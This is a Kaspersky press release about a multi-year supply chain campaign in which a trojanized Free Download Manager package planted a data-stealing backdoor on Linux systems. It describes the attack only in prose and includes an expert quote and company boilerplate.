Kaspersky experts identified a new malicious campaign targeting Linux systems, where threat actors deployed a backdoor – a type of Trojan – onto victims’ devices using infected version of a popular free software: Free Download Manager. Once the device is infected, the attackers’ goal is to steal information such as details about system, browsing history, saved passwords, cryptocurrency wallet files, and even credentials for cloud services like Amazon Web Services or Google Cloud. According to Kaspersky’s telemetry, victims of this campaign are located all over the world, including Brazil, China, Saudi Arabia and Russia.
Kaspersky experts believe it is likely that this is a supply chain attack. During the investigation into Free Download Manager installation guides on YouTube for Linux computers, the company’s experts found instances where video creators inadvertently showcased the initial infection process: clicking the download button on the official website resulted in a malicious version of Free Download Manager being downloaded. In contrast, in another video, a legitimate version of the software was downloaded. It is possible that the malware developers scripted the malicious redirection to appear with some degree of probability or based on digital fingerprint of the potential victim. As a result, some users encountered a malicious package, while others obtained a clean one.
According to Kaspersky’s findings, the campaign lasted for at least three years – from 2020 to 2022. The malicious package installed the Free Download Manager version released in 2020. Moreover, over the course of this timeframe, there were discussions on websites such as StackOverflow and Reddit about problems caused by the infected software distribution. However, the users were unaware that these issues were caused by malicious activity.
A Reddit user wondered if they can install Free Download Manager without running a script that turned out to contain malware
“Variants of the analyzed backdoor have been detectable by Kaspersky solutions for Linux since 2013. However, there is a widespread misconception that Linux is immune to malware, leaving many of these systems without adequate cybersecurity protection. This lack of protection makes these systems attractive targets for cybercriminals. Essentially, the Free Download Manager case highlights the challenge of spotting an ongoing cyberattack on a Linux system with the naked eye. Therefore, it's essential for Linux-based computers, including both desktops and servers, to implement reliable and effective security measures”, says Georgy Kucherin, a security expert at GReAT, Kaspersky.
Technical analysis of the campaign is presented in the Securelist post.
To avoid Linux-based and other types of threats, it is worth implementing the following security measures:
Kaspersky is a global cybersecurity and digital privacy company founded in 1997. Kaspersky’s deep threat intelligence and security expertise is constantly transforming into innovative solutions and services to protect businesses, critical infrastructure, governments and consumers around the globe. The company’s comprehensive security portfolio includes leading endpoint protection, specialized security products and services, as well as Cyber Immune solutions to fight sophisticated and evolving digital threats. Over 400 million users are protected by Kaspersky technologies and we help over 220,000 corporate clients protect what matters most to them. Learn more at www.kaspersky.com.